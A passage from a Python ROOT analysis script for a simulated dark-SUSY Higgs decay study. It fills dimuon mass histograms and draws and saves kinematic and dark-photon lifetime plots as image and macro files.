FakeDimuons.append(( fakeV4_1.Px(), fakeV4_1.Py(), fakeV4_1.Pz(), fakeV4_1.E(), fakeV4_1.M(), fakeV4_1.Pt(), fakeV4_1.Eta(), fakeV4_1.Phi() ))
FakeDimuons.append(( fakeV4_2.Px(), fakeV4_2.Py(), fakeV4_2.Pz(), fakeV4_2.E(), fakeV4_2.M(), fakeV4_2.Pt(), fakeV4_2.Eta(), fakeV4_2.Phi() ))
h_dimuon_m_fake_log_0.Fill(FakeDimuons[0][4])
h_dimuon_m_fake_log_0.Fill(FakeDimuons[1][4])
h_dimuon_m_fake_0.Fill(FakeDimuons[0][4])
h_dimuon_m_fake_0.Fill(FakeDimuons[1][4])
# is1SelMu17 = False
# for i in range(0, len(muons) ):
# if muons[i][6] >= 17. and abs(muons[i][7]) <= 0.9: is1SelMu17 = True
#
# is4SelMu8 = False
# nSelMu8 = 0
# for i in range(0, len(muons) ):
# if muons[i][6] >= 8. and abs(muons[i][7]) <= 2.4: nSelMu8 = nSelMu8 + 1
# if nSelMu8 == 4: is4SelMu8 = True
#
# if is1SelMu17 and is4SelMu8:
# for i in range(0, len(muons) ):
# for j in range(i+1, len(muons) ):
# if muons[i][0] * muons[j][0] < 0:
# px = muons[i][1] + muons[j][1]
# py = muons[i][2] + muons[j][2]
# pz = muons[i][3] + muons[j][3]
# E = muons[i][4] + muons[j][4]
# v4 = ROOT.TLorentzVector(px, py, pz, E)
# dimuons.append(( i, j, v4.Px(), v4.Py(), v4.Pz(), v4.E(), v4.M(), v4.Pt(), v4.Eta(), v4.Phi() ))
# dimuons_sorted_M = sorted(dimuons, key=itemgetter(6), reverse=True)
# dimuons = dimuons_sorted_M
# # print "Dimuons:", dimuons
# h_dimuon_m_0.Fill( dimuons[0][6] )
# h_dimuon_m_1.Fill( dimuons[1][6] )
# h_dimuon_m_2.Fill( dimuons[2][6] )
# h_dimuon_m_3.Fill( dimuons[3][6] )
#
# h_dimuon_m_log_0.Fill( dimuons[0][6] )
# h_dimuon_m_log_1.Fill( dimuons[1][6] )
# h_dimuon_m_log_2.Fill( dimuons[2][6] )
# h_dimuon_m_log_3.Fill( dimuons[3][6] )
#
# #print dimuons[0][6]
# #print float(mass_GammaD_Legend)
# #if dimuons[0][6] > float(mass_GammaD_Legend): print "fake"
# #if dimuons[0][6] <= float(mass_GammaD_Legend): print "real"
# if dimuons[0][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_1.Fill(dimuons[0][6])
# if dimuons[0][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_0.Fill(dimuons[0][6])
# if dimuons[1][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_1.Fill(dimuons[1][6])
# if dimuons[1][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_0.Fill(dimuons[1][6])
# if dimuons[2][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_1.Fill(dimuons[2][6])
# if dimuons[2][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_0.Fill(dimuons[2][6])
# if dimuons[3][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_1.Fill(dimuons[3][6])
# if dimuons[3][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_0.Fill(dimuons[3][6])
#
# if dimuons[0][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_1.Fill(dimuons[0][6])
# if dimuons[0][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_0.Fill(dimuons[0][6])
# if dimuons[1][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_1.Fill(dimuons[1][6])
# if dimuons[1][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_0.Fill(dimuons[1][6])
# if dimuons[2][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_1.Fill(dimuons[2][6])
# if dimuons[2][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_0.Fill(dimuons[2][6])
# if dimuons[3][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_1.Fill(dimuons[3][6])
# if dimuons[3][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_0.Fill(dimuons[3][6])
# dimuons5GeV = []
# for i in range(0, len(dimuons)):
# # select only dimuons with invariant mass less than 5 GeV
# if dimuons[i][6] < 5.0: dimuons5GeV.append( dimuons[i] )
#
# nDimuons5GeV = len(dimuons5GeV)
#
# is2DiMuons = False
# nMuJetsContainMu17 = 0
# m_threshold_Mu17_pT = 17.0
# m_threshold_Mu17_eta = 0.9
# m_randomSeed = 1234
# if nDimuons5GeV == 2:
# # select only dimuons that do NOT share muons
# if dimuons5GeV[0][0] != dimuons5GeV[1][0] and dimuons5GeV[0][0] != dimuons5GeV[1][1] and dimuons5GeV[0][1] != dimuons5GeV[1][1] and dimuons5GeV[0][1] != dimuons5GeV[1][0]:
# isDimuon0ContainMu17 = False
# if ( muons[ dimuons5GeV[0][0] ][6] > m_threshold_Mu17_pT and muons[ dimuons5GeV[0][0] ][7] < m_threshold_Mu17_eta ) or ( muons[ dimuons5GeV[0][1] ][6] > m_threshold_Mu17_pT and muons[ dimuons5GeV[0][1] ][7] < m_threshold_Mu17_eta ):
# isDimuon0ContainMu17 = True
# if ( muons[ dimuons5GeV[1][0] ][6] > m_threshold_Mu17_pT and muons[ dimuons5GeV[1][0] ][7] < m_threshold_Mu17_eta ) or ( muons[ dimuons5GeV[1][1] ][6] > m_threshold_Mu17_pT and muons[ dimuons5GeV[1][1] ][7] < m_threshold_Mu17_eta ):
# isDimuon1ContainMu17 = True
# if isDimuon0ContainMu17 == True and isDimuon1ContainMu17 == False:
# is2DiMuons = True
# muJetC = dimuons5GeV[0]
# muJetF = dimuons5GeV[1]
# elif isDimuon0ContainMu17 == False and isDimuon1ContainMu17 == True:
# is2DiMuons = True
# muJetC = dimuons5GeV[1]
# muJetF = dimuons5GeV[0]
# elif isDimuon0ContainMu17 == True and isDimuon1ContainMu17 == True:
# is2DiMuons = True
# if(ROOT.TRandom3(m_randomSeed).Integer(2) == 0):
# muJetC = dimuons5GeV[0]
# muJetF = dimuons5GeV[1]
# else:
# muJetC = dimuons5GeV[1]
# muJetF = dimuons5GeV[0]
# else:
# is2DiMuons = False
#
# is2DiMuonsMassOK = False
# if is2DiMuons:
# massC = muJetC[6]
# massF = muJetF[6]
# h_m1_vs_m2.Fill(massC, massF)
# h_m1.Fill( massC )
# h_m2.Fill( massF )
# if abs(massC-massF) < (0.13 + 0.065*(massC+massF)/2.0):
# is2DiMuonsMassOK = True
#
# if is2DiMuonsMassOK == True:
# nEventsOK = nEventsOK + 1
print "nEvents = ", nEvents
print "nEventsOK = ", nEventsOK
################################################################################
# Draw histograms
################################################################################
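# Each plot follows the same pattern: draw an empty "dummy" histogram to fix the
# axes, overlay the normalized distribution(s), rescale the y-axis, add the
# legend and labels, and save the canvas as .pdf, .png and .C.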
Etmiss_dummy.Draw()
Etmiss.DrawNormalized("same")
scaleAxisY(Etmiss,Etmiss_dummy)
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_EtMiss.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_EtMiss.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_EtMiss.C")
h_higgs_pT_dummy.Draw()
h_higgs_pT.DrawNormalized("same")
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_pT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_pT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_pT.C")
h_higgs_pZ_dummy.Draw()
#h_higgs_pZ.DrawNormalized("same")
plotOverflow(h_higgs_pZ)
scaleAxisY(h_higgs_pZ,h_higgs_pZ_dummy)
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_pZ.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_pZ.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_pZ.C")
#h_higgs_Eta_dummy.Draw()
#h_higgs_Eta.DrawNormalized("same")
#info.Draw()
#txtHeader.Draw()
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_Eta.pdf")
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_Eta.png")
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_Eta.png")
h_higgs_Phi_dummy.Draw()
h_higgs_Phi.DrawNormalized("same")
#scaleAxisY(h_higgs_Phi,h_higgs_Phi_dummy)
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_Phi.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_Phi.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_Phi.C")
cnv.SetLogx()
h_higgs_M_dummy.Draw()
h_higgs_M_dummy.SetNdivisions(10)
h_higgs_M_dummy.GetXaxis().SetMoreLogLabels()
h_higgs_M.GetXaxis().SetMoreLogLabels()
h_higgs_M.DrawNormalized("same")
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_m.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_m.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_m.C")
cnv.SetLogx(0)
h_higgs_p_dummy.Draw()
#h_higgs_p.DrawNormalized("same")
plotOverflow(h_higgs_p)
scaleAxisY(h_higgs_p,h_higgs_p_dummy)
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_p.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_p.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_p.C")
h_n1_1_pT_dummy.Draw()
h_n1_1_pT.DrawNormalized("same")
h_n1_2_pT.DrawNormalized("same")
scaleAxisY(h_n1_1_pT, h_n1_1_pT_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_n1_1_pT,"1st neutralino","L")
legend.AddEntry(h_n1_2_pT,"2nd neutralino","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_pT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_pT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_pT.C")
h_n1_1_pZ_dummy.Draw()
plotOverflow(h_n1_1_pZ)
plotOverflow(h_n1_2_pZ)
scaleAxisY(h_n1_1_pZ,h_n1_1_pZ_dummy)
#h_n1_1_pZ.DrawNormalized("same")
#h_n1_2_pZ.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_n1_1_pZ,"1st neutralino","L")
legend.AddEntry(h_n1_2_pZ,"2nd neutralino","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_pZ.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_pZ.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_pZ.C")
h_n1_1_Eta_dummy.Draw()
h_n1_1_Eta.DrawNormalized("same")
h_n1_2_Eta.DrawNormalized("same")
scaleAxisY(h_n1_1_Eta,h_n1_1_Eta_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_n1_1_Eta,"1st neutralino","L")
legend.AddEntry(h_n1_2_Eta,"2nd neutralino","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_Eta.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_Eta.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_Eta.C")
h_n1_1_Phi_dummy.Draw()
h_n1_1_Phi.DrawNormalized("same")
h_n1_2_Phi.DrawNormalized("same")
scaleAxisY(h_n1_1_Phi,h_n1_1_Phi_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_n1_1_Phi,"1st neutralino","L")
legend.AddEntry(h_n1_2_Phi,"2nd neutralino","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_Phi.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_Phi.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_Phi.C")
h_n1_1_p_dummy.Draw()
plotOverflow(h_n1_1_p)
plotOverflow(h_n1_2_p)
scaleAxisY(h_n1_1_p,h_n1_1_p_dummy)
#h_n1_1_p.DrawNormalized("same")
#h_n1_2_p.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_n1_1_p,"1st neutralino","L")
legend.AddEntry(h_n1_2_p,"2nd neutralino","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_p.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_p.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_p.C")
h_n1_1_M_dummy.Draw()
h_n1_1_M.DrawNormalized("same")
#h_n1_2_M.DrawNormalized("same")
#legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
#legend.SetFillColor(ROOT.kWhite)
#legend.SetFillStyle(0)
#legend.SetBorderSize(0)
#legend.SetTextFont(42)
#legend.SetTextSize(0.02777778)
#legend.SetMargin(0.13)
#legend.AddEntry(h_n1_1_M,"1st neutralino (leading p_{T})","L")
#legend.AddEntry(h_n1_2_M,"2nd neutralino","L")
#legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_M.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_M.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_M.C")
h_nD_1_pT_dummy.Draw()
#h_nD_1_pT.DrawNormalized("same")
#h_nD_2_pT.DrawNormalized("same")
plotOverflow(h_nD_1_pT)
plotOverflow(h_nD_2_pT)
scaleAxisY(h_nD_2_pT,h_nD_1_pT_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_nD_1_pT,"1st n_{D} (leading p_{T})","L")
legend.AddEntry(h_nD_2_pT,"2nd n_{D}","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_pT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_pT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_pT.C")
h_nD_1_pZ_dummy.Draw()
h_nD_1_pZ.DrawNormalized("same")
h_nD_2_pZ.DrawNormalized("same")
scaleAxisY(h_nD_2_pZ,h_nD_1_pZ_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_nD_1_pZ,"1st n_{D} (leading p_{T})","L")
legend.AddEntry(h_nD_2_pZ,"2nd n_{D}","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_pZ.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_pZ.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_pZ.C")
h_nD_1_Eta_dummy.Draw()
h_nD_1_Eta.DrawNormalized("same")
h_nD_2_Eta.DrawNormalized("same")
scaleAxisY(h_nD_1_Eta,h_nD_1_Eta_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_nD_1_Eta,"1st n_{D} (leading p_{T})","L")
legend.AddEntry(h_nD_2_Eta,"2nd n_{D}","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_Eta.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_Eta.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_Eta.C")
h_nD_1_Phi_dummy.Draw()
h_nD_1_Phi.DrawNormalized("same")
h_nD_2_Phi.DrawNormalized("same")
scaleAxisY(h_nD_1_Phi,h_nD_1_Phi_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_nD_1_Phi,"1st n_{D} (leading p_{T})","L")
legend.AddEntry(h_nD_2_Phi,"2nd n_{D}","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_Phi.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_Phi.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_Phi.C")
h_nD_1_p_dummy.Draw()
h_nD_1_p.DrawNormalized("same")
h_nD_2_p.DrawNormalized("same")
scaleAxisY(h_nD_2_p,h_nD_1_p_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_nD_1_p,"1st n_{D} (leading p_{T})","L")
legend.AddEntry(h_nD_2_p,"2nd n_{D}","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_p.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_p.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_p.C")
h_nD_1_M_dummy.Draw()
h_nD_1_M.DrawNormalized("same")
#h_nD_2_M.DrawNormalized("same")
#legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
#legend.SetFillColor(ROOT.kWhite)
#legend.SetFillStyle(0)
#legend.SetBorderSize(0)
#legend.SetTextFont(42)
#legend.SetTextSize(0.02777778)
#legend.SetMargin(0.13)
#legend.AddEntry(h_nD_1_M,"1st n_{D} (leading p_{T})","L")
#legend.AddEntry(h_nD_2_M,"2nd n_{D}","L")
#legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_M.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_M.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_M.C")
h_gammaD_cT_dummy.Draw()
normConstant = integral(h_gammaD_cT)
#print normConstant
h_gammaD_cT.Scale(1/normConstant)
h_gammaD_cT.Draw("same")
scaleAxisYcT(h_gammaD_cT,h_gammaD_cT_dummy)
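# Overlay the expected proper-lifetime pdf, an exponential truncated to the
# plotted range [cTlow, cTlim] and normalized to unit integral:
# f(x) = exp(-x/cT) / ( cT * (1 - exp(-cTlim/cT)) )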
funct = ROOT.TF1("funct","exp(-x/"+ lifetime_GammaD_Legend +")/("+ lifetime_GammaD_Legend + "*(1 - exp(-" + str(cTlim) + "/" + lifetime_GammaD_Legend + ")))",cTlow,cTlim)
funct.SetNpx(10000)
funct.Draw("same")
h_gammaD_cT.SetTitleOffset(1.5, "Y")
h_gammaD_cT.SetXTitle("c#tau of #gamma_{D} [mm]")
h_gammaD_cT.SetYTitle("Normalized Fraction of events")
h_gammaD_cT.SetTitleSize(0.05,"Y")
info.Draw()
txtHeader.Draw()
eqn = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
eqn.SetFillColor(ROOT.kWhite)
eqn.SetFillStyle(0)
eqn.SetBorderSize(0)
eqn.SetTextFont(42)
eqn.SetTextSize(0.02777778)
eqn.SetMargin(0.13)
eqn.AddEntry(funct, "#frac{e^{-x/"+ lifetime_GammaD_Legend +"}}{"+ lifetime_GammaD_Legend + " (1 - e^{-" + str(cTlim) + "/" + lifetime_GammaD_Legend + "})}", "L")
eqn.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_cT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_cT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_cT.C")
h_gammaD_cT_lab_dummy.Draw()
normConstant = integral(h_gammaD_cT_lab)
h_gammaD_cT_lab.Scale(1/normConstant)
h_gammaD_cT_lab.Draw("same")
scaleAxisYcT(h_gammaD_cT_lab,h_gammaD_cT_lab_dummy)
#h_gammaD_cT_lab.DrawNormalized("same")
#myfit = ROOT.TF1("myfit", "[0]*exp(-x/[1])", 0, 10)
#myfit.SetParName(0,"C")
#myfit.SetParName(1,"L")
#myfit.SetParameter(0,1)
#myfit.SetParameter(1,1)
#h_gammaD_cT_lab.Fit("myfit").Draw("same")
h_gammaD_cT_lab.SetTitleOffset(1.5, "Y")
h_gammaD_cT_lab.SetXTitle("L of #gamma_{D} [mm]")
h_gammaD_cT_lab.SetYTitle("Normalized Fraction of events")
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L.C")
h_gammaD_cT_XY_lab_dummy.Draw()
normConstant = integral(h_gammaD_cT_XY_lab)
h_gammaD_cT_XY_lab.Scale(1/normConstant)
h_gammaD_cT_XY_lab.Draw("same")
scaleAxisYcT(h_gammaD_cT_XY_lab,h_gammaD_cT_XY_lab_dummy)
#h_gammaD_cT_XY_lab.DrawNormalized("same")
#myfit = ROOT.TF1("myfit", "[0]*exp(-x/[1])", 0, 10)
#myfit.SetParName(0,"C")
#myfit.SetParName(1,"L_{xy}")
#myfit.SetParameter(0,1)
#myfit.SetParameter(1,1)
#h_gammaD_cT_XY_lab.Fit("myfit").Draw("same")
h_gammaD_cT_XY_lab.SetTitleOffset(1.5, "Y")
h_gammaD_cT_XY_lab.SetXTitle("L_{xy} of #gamma_{D} [mm]")
h_gammaD_cT_XY_lab.SetYTitle("Normalized Fraction of events")
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L_XY.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L_XY.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L_XY.C")
h_gammaD_cT_Z_lab_dummy.Draw()
normConstant = integral(h_gammaD_cT_Z_lab)
h_gammaD_cT_Z_lab.Scale(1/normConstant)
h_gammaD_cT_Z_lab.Draw("same")
scaleAxisYcT(h_gammaD_cT_Z_lab,h_gammaD_cT_Z_lab_dummy)
#h_gammaD_cT_Z_lab.DrawNormalized("same")
#myfit = ROOT.TF1("myfit", "[0]*exp(-x/[1])", 0, 10)
#myfit.SetParName(0,"C")
#myfit.SetParName(1,"L_{z}")
#myfit.SetParameter(0,1)
#myfit.SetParameter(1,1)
#h_gammaD_cT_Z_lab.Fit("myfit").Draw("same")
h_gammaD_cT_Z_lab.SetTitleOffset(1.5, "Y")
h_gammaD_cT_Z_lab.SetXTitle("L_{z} of #gamma_{D} [mm]")
h_gammaD_cT_Z_lab.SetYTitle("Normalized Fraction of events")
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L_Z.pdf")
